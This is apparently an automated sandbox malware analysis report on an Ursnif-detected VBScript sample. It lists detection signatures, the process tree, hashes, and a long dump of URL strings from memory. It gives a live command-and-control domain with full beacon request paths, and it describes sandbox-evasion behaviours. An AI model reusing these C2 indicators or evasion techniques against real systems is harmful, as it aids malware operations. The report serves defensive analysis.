
Analysis Report DGDvEtyCrEmX.vbs

Overview

General Information

Sample Name: DGDvEtyCrEmX.vbs
Analysis ID: 288701
MD5: 82cf315cdb889ef199a496166b75ae9d
SHA1: b80315de87e81434e64b55a2d620f5d13cacfd5a
SHA256: 0c256d146ed7b8982afd6f101b42f01a9c8538e3e2187d7d889692eb296646da


Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6792 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\DGDvEtyCrEmX.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 3888 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4852 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3888 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 7164 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 964 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7164 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000003.388410277.0000000005888000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.388483202.0000000005888000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.388462091.0000000005888000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.388313848.0000000005888000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.388384941.0000000005888000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(3 further entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Mardi.rm | Avira: detection malicious, Label: TR/AD.UrsnifDropper.xehvx
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Mardi.rm | Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Local\Temp\Mardi.rm | ReversingLabs: Detection: 34%
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: Joe Sandbox View | IP Address: 8.208.101.13
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic | HTTP traffic detected:
    GET /api1/4Sqd9epbzKerX/xMaPLIic/w1aJGgLYfiNImxsG5y7HUhj/V3aKUBMI40/DGOcC3ck_2FklPS0E/skMzuUWIPXYS/ywsRc4UZm_2/BHZaK_2FMELNHy/rvqdc18ebJ_2BNPw_2Fwt/BuWeGMN94djFO4ym/BWgpiq6kKV8o9lQ/rIRwMlcsRbNzY0jEob/R10Wg9rfn/tMewZ7N7SgG_2BBjRksS/i9PAdksuzbNh36wLisw/SfAKpCojDvpWR41T9gmDt3/a_2FZ8G_2FVkq/LVuB9Nj_/0A_0DEn9MrQNs10ebRdQxOM/RSwG4uo3a1/6x8VynoT/p9yXG1ksfG/8 HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /api1/s2I4U4mE/_2BQkctvXdCdE5BVzv5DPCn/MMxp_2BtIk/bZ47Bu_2B7GtuUfsB/s7A_2F49C1qC/XCLiVM99aaG/WANtktDl66EkjA/Zg7EmyQ8WR10dwf5wmuj5/kl8Od1cU_2BgowAQ/BhcrAFgrpglQTCc/9PO5aV68hbyI_2Bci0/pwh_2FXRA/m0yZ6bPHSgfVP3N_2BfI/wwo9MVpC8U7spBhdHFU/65BFG9R0eyQ90npLpuPohs/UbouGRm_2B6gm/qpAA6kW4/nq9w_2BczRb_2Fy9G1_0A_0/Dg57uLpuGn/biJjuTpnWhTrLzYmW/40vxULO5WJfq/gVSKZYQjH9J/PdcQPqTLFhn/0saaZ3Z3 HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: api10.laptok.at
    Connection: Keep-Alive
Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml1.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8e9b4cc0,0x01d6913d</date><accdate>0x8e9b4cc0,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8e9b4cc0,0x01d6913d</date><accdate>0x8ea01169,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8ecfc066,0x01d6913d</date><accdate>0x8ecfc066,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8ecfc066,0x01d6913d</date><accdate>0x8ecfc066,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8ed484f7,0x01d6913d</date><accdate>0x8ed484f7,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8ed484f7,0x01d6913d</date><accdate>0x8ed484f7,0x01d6913d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 22 Sep 2020 15:07:12 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Content-Encoding: gzip
    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Source: iexplore.exe, 0000001B.00000002.496692062.0000000005740000.00000002.00000001.sdmp | String found in binary or memory: http://%s.com
Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: {B8659F81-FD30-11EA-90E8-ECF4BBEA1588}.dat.19.dr, ~DF297DC7DFA8CBF825.TMP.19.dr | String found in binary or memory: http://api10.laptok.at/api1/4Sqd9epbzKerX/xMaPLIic/w1aJGgLYfiNImxsG5y7HUhj/V3aKUBMI40/DGOcC3ck_2FklP
Source: iexplore.exe, 0000001B.00000002.484082517.0000000000ACE000.00000004.00000020.sdmp, iexplore.exe, 0000001B.00000002.484805029.0000000000B03000.00000004.00000020.sdmp | String found in binary or memory: http://api10.laptok.at/api1/s2I4U4mE/_2BQkctvXdCdE5BVzv5DPCn/MMxp_2BtIk/bZ47Bu_2B7GtuUfsB/s7A_2F49C1
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.496692062.0000000005740000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.483432936.0000000000A9C000.00000004.00000020.sdmpString found in binary or memory: http://w3.or
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: iexplore.exe, 0000001B.00000002.496692062.0000000005740000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.19.drString found in binary or memory: http://www.amazon.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml2.19.drString found in binary or memory: http://www.google.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml3.19.drString found in binary or memory: http://www.live.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml4.19.drString found in binary or memory: http://www.nytimes.com/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: iexplore.exe, 0000001B.00000002.497245199.0000000005833000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
